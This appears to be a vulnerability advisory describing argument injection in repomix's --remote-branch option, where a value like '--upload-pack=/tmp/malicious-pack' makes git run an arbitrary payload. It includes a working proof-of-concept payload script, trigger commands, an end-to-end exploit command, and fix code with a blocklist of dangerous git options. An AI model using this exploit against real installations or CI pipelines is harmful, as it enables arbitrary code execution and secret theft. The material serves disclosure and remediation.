The `--remote-branch` CLI option in repomix is vulnerable to argument injection (CWE-88). User-supplied input is passed directly to `git fetch` and `git checkout` subprocesses via `child_process.execFileAsync` without sanitization, a `--` delimiter, or validation. An attacker can inject arbitrary git command-line options. By injecting the `--upload-pack` option and specifying an SSH (`git@...`) or local (`file://`) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing `dangerousParams` blocklist implemented in `validateGitUrl()`.
The vulnerable code resides in `src/core/git/gitCommand.ts`. The `remoteBranch` parameter is appended directly to the arguments array for git subprocesses without the `--` positional delimiter. Sink 1 (lines 118-127): `await deps.execFileAsync('git', ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], gitRemoteOpts);`. Sink 2 (lines 148-151): `await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]);`. The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (`--upload-pack`, `--receive-pack`, `--config`, `--exec`) within the `validateGitUrl` function. However, this validation is applied exclusively to the `url` variable and omitted for `remoteBranch`, creating a direct bypass.
The attack flow is:
`repomix --remote-branch <injected_option>` → `src/cli/actions/remoteAction.ts:226` (cloneRepository) → `src/core/git/gitCommand.ts:118` (execGitShallowClone) → `execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])` → git invokes the payload binary via the transport helper. Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: Repomix
Version: <1.14.1
Vulnerability: Argument Injection
Severity: High (8.8)
Date: 2026-05-18
<h2 style="color: blue;">Prediction: 2026-05-27</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>
<ul>
<li>Attack Vector: Remote</li>
<li>Privileges Required: None</li>
<li>User Interaction: Required</li>
<li>CVSS Score: 8.8</li>
</ul>
<h2 style="color: blue;">Bash Commands & Codes:</h2>
```bash
# Create payload
cat > /tmp/malicious-pack << 'EOF'
#!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack

# Trigger vulnerability
git init --bare /tmp/dummy-remote.git
mkdir /tmp/test-fetch && cd /tmp/test-fetch
git init
git remote add origin file:///tmp/dummy-remote.git
git fetch --upload-pack=/tmp/malicious-pack origin 2>&1

# Verify execution
cat /tmp/repomix-pwned.txt
```
End-to-End Exploit:
```bash
repomix --remote [email protected]:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'
```
Exploit:
- Create an executable payload script that writes system execution context to a file.
- Establish a dummy remote and trigger the fetch operation, injecting the `--upload-pack` argument.
- The payload executes prior to git protocol validation, achieving arbitrary command execution with the privileges of the user running repomix.
Protection:
- Primary Fix: Append the `--` delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing `remoteBranch`:
```typescript
await deps.execFileAsync('git', ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch], gitRemoteOpts);
```
- Defense in Depth: Update `execGitShallowClone` to validate `remoteBranch` against the existing `dangerousParams` array:
```typescript
const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec'];
if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) {
  throw new RepomixError(`Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}`);
}
```
- Upgrade to repomix v1.14.1 or later.
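The two sinks described at the top of this page and the two protections listed above, combined in one added example that is not repomix's own code: a `remoteBranch` validator plus builders for the `fetch` and `checkout` argument arrays that would be handed to `execFile`. The names `validateRemoteBranch`, `buildFetchArgs`, `buildCheckoutArgs`, `buildFetchArgsUnsafe`, `isRefPositional` and `GitArgError` are assumptions; `buildFetchArgsUnsafe` only reproduces the pre-fix argument order quoted in the advisory so the two shapes can be compared.

```typescript
// Added example (not repomix's own code): hardened construction of the git argv for the
// shallow fetch and the checkout, combining the '--' delimiter with validation of
// remoteBranch. All function and class names here are assumptions.

class GitArgError extends Error {}

// Same blocklist the advisory says validateGitUrl() already applies to the URL.
const DANGEROUS_PARAMS: readonly string[] = ['--upload-pack', '--receive-pack', '--config', '--exec'];

// Reject anything git could parse as an option instead of a ref. A leading '-' is the
// general case; the blocklist is the explicit defense in depth the advisory recommends.
function validateRemoteBranch(remoteBranch: string): string {
  if (remoteBranch.length === 0) {
    throw new GitArgError('Invalid branch name. Must not be empty');
  }
  if (remoteBranch.startsWith('-')) {
    throw new GitArgError(`Invalid branch name. Must not begin with '-': ${remoteBranch}`);
  }
  if (DANGEROUS_PARAMS.some((param) => remoteBranch.includes(param))) {
    throw new GitArgError(`Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}`);
  }
  return remoteBranch;
}

// Pre-fix argument order as quoted in the advisory (sink 1): remoteBranch is the last token
// and git still parses options at that position, so an option-shaped value is honored.
function buildFetchArgsUnsafe(directory: string, remoteBranch: string): string[] {
  return ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch];
}

// Fixed order: the ref is validated first, and '--' ends option parsing so that whatever
// follows is positional regardless of how it is spelled.
function buildFetchArgs(directory: string, remoteBranch: string): string[] {
  const ref = validateRemoteBranch(remoteBranch);
  return ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', ref];
}

// Sink 2: `git checkout -- <name>` makes git treat <name> as a pathspec rather than a branch,
// so the delimiter is not used here; validation alone keeps the value out of option parsing.
function buildCheckoutArgs(directory: string, remoteBranch: string): string[] {
  const ref = validateRemoteBranch(remoteBranch);
  return ['-C', directory, 'checkout', ref];
}

// True when `ref` occurs after a '--' token, i.e. where git can no longer read it as an option.
function isRefPositional(args: string[], ref: string): boolean {
  const delimiter = args.indexOf('--');
  return delimiter !== -1 && args.indexOf(ref, delimiter + 1) !== -1;
}

// Stand-alone demonstration over constructed branch names.
function demo(): void {
  console.log(buildFetchArgs('/tmp/repo', 'main'));
  for (const candidate of ['feature/login', '--upload-pack=/tmp/x', '-q']) {
    try {
      validateRemoteBranch(candidate);
      console.log(`accepted: ${candidate}`);
    } catch (err) {
      console.log(`rejected: ${candidate} (${(err as Error).message})`);
    }
  }
}
demo();
```

The delimiter is the right fix for the `fetch` sink because git stops option parsing at `--` and the ref can only be a ref afterwards. It is not a drop-in for the `checkout` sink: `git checkout -- <name>` tells git to restore paths matching `<name>`, so for that call the validator, and in particular rejecting a leading `-`, is what keeps the argument from being interpreted as an option.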
Impact:
- Remote Code Execution: Complete system compromise with the privileges of the user executing repomix.
- CI/CD Compromise: If repomix is utilized in automated pipelines where `--remote-branch` is populated by external triggers (e.g., webhook payloads, PRs), attackers can compromise build servers and exfiltrate secrets.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

